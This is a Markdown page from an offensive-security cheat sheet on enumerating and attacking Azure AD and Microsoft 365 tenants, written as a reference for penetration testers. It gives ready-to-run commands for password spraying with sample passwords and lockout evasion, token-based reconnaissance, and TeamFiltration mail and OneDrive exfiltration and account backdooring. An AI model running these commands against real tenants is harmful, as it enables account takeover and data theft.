InternalAllTheThings/docs/cloud/azure/azure-enumeration.md

Azure AD - Enumerate

Azure AD - Collectors

• Microsoft Portals - Microsoft Administrator Sites
• dirkjanm/ROADTool - A collection of Azure AD tools for offensive and defensive security purposes

  roadrecon auth --access-token eyJ0eXA...
  roadrecon auth --prt-cookie <primary-refresh-token> -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2"
  roadrecon gather
  roadrecon gui
  

• BloodHoundAD/AzureHound - Azure Data Exporter for BloodHound

  ./azurehound --refresh-token <refresh-token> list --tenant "<target-tenant-id>" -o output.json
  ./azurehound -u "<username>@contoso.onmicrosoft.com" -p "<password>" list groups --tenant "<tenant>.onmicrosoft.com"
  ./azurehound -j "<jwt>" list users --tenant "<tenant>.onmicrosoft.com"
  

• BloodHoundAD/BARK - BloodHound Attack Research Kit

  . .\BARK.ps1
  $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
  $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
  $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
  

• dafthack/GraphRunner - A Post-exploitation Toolset for Interacting with the Microsoft Graph API

  Invoke-GraphRecon -Tokens $tokens -PermissionEnum
  Invoke-DumpCAPS -Tokens $tokens -ResolveGuids
  Invoke-DumpApps -Tokens $tokens
  Get-DynamicGroups -Tokens $tokens
  

• NetSPI/MicroBurst - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping

  PS C:> Import-Module .\MicroBurst.psm1
  PS C:> Import-Module .\Get-AzureDomainInfo.ps1
  PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
  

• hausec/PowerZure - PowerShell framework to assess Azure security

  Import-Module .\Powerzure.psd1
  Set-Subscription -Id [idgoeshere]
  Get-AzureTarget
  Get-AzureInTuneScript
  Show-AzureKeyVaultContent -All
  

• silverhack/monkey365 - Microsoft 365, Azure subscriptions and Microsoft Entra ID security configuration reviews.

  Get-ChildItem -Recurse c:\monkey365 | Unblock-File
  Import-Module C:\temp\monkey365
  Get-Help Invoke-Monkey365
  Get-Help Invoke-Monkey365 -Examples
  Get-Help Invoke-Monkey365 -Detailed
  

• prowler-cloud/prowler - Prowler is an Open Source Security tool for AWS, Azure, GCP and Kubernetes to do security assessments, audits, incident response, compliance, continuous monitoring, hardening and forensics readiness. Includes CIS, NIST 800, NIST CSF, CISA, FedRAMP, PCI-DSS, GDPR, HIPAA, FFIEC, SOC2, GXP, Well-Architected Security, ENS and more
• projectdiscovery/nuclei-templates - Community curated list of templates for the nuclei engine to find security vulnerabilities.

  nuclei -t ~/nuclei-templates/cloud/azure/ -code -v
  

• nccgroup/ScoutSuite - Multi-Cloud Security Auditing Tool
• Flangvik/TeamFiltration - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts

  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad 
  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
  

• Azure/StormSpotter - ⚠️ This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
• nccgroup/Azucar - ⚠️ This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
• FSecureLABS/Azurite - ⚠️ This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
• cyberark/SkyArk - ⚠️ This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.

Azure AD - User Enumeration

Enumerate Tenant Informations

• Federation with Azure AD or O365

  Get-AADIntLoginInformation -UserName <USER>@<TENANT NAME>.onmicrosoft.com
  https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
  https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
  

• Get the Tenant ID

  Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com
  https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
  https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
  

Enumerate from a Guest Account

powerpwn recon --tenant {tenantId} --cache-path {path}
powerpwn dump -tenant {tenantId} --cache-path {path}
powerpwn gui --cache-path {path}

Enumerate Emails

By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.

• Validate email

  PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt
  admin@<TENANT NAME>.onmicrosoft.com   - VALID
  root@<TENANT NAME>.onmicrosoft.com    - INVALID
  test@<TENANT NAME>.onmicrosoft.com    - VALID
  contact@<TENANT NAME>.onmicrosoft.com - INVALID
  

• Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon

  Install-Module MSOnline
  Install-Module AzureAD
  .\o365recon.ps1 -azure
  

Password Spraying

The default lockout policy tolerates 10 failed attempts, then lock out an account for 60 seconds.

• dafthack/MSOLSpray

  PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1
  PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose
  PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
  PS> Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
  

• 0xZDH/o365spray

  o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com
  

• Flangvik/TeamFiltration

  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
  TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
  

Azure Services Enumeration

Enumerate Tenant Domains

Extract openly available information for the given tenant: aadinternals.com/osint

Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table

Enumerate Azure Subdomains

PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME>.mail.protection.outlook.com Email
<TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain

Enumerate Services

• Using Az Powershell module

  # Enumerate resources
  PS Az> Get-AzResource
  
  # List all VM's the user has access to
  PS Az> Get-AzVM 
  
  # Get all webapps
  PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
  
  # Get all function apps
  PS Az> Get-AzFunctionApp
  
  # List all storage accounts
  PS Az> Get-AzStorageAccount
  
  # List all keyvaults
  PS Az> Get-AzKeyVault
  
  # Get all application objects registered using the current tenant
  PS AzureAD> Get-AzureADApplication -All $true
  
  # Enumerate role assignments
  PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>
  PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
  
  # Check AppID Alternative Names/Display Name 
  PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
  

• Using az cli

  PS> az vm list
  PS> az vm list --query "[].[name]" -o table
  PS> az webapp list
  PS> az functionapp list --query "[].[name]" -o table
  PS> az storage account list
  PS> az keyvault list
  

Multi Factor Authentication

• dafthack/MFASweep - A tool for checking if MFA is enabled on multiple Microsoft Services

Import-Module .\MFASweep.ps1
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS

References

• Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020
• CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course
• Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020
• Training - Attacking and Defending Azure Lab - Altered Security
• Azure Config Review - Nuclei Templates v10.0.0 - Prince Chaddha - Sep 12, 2024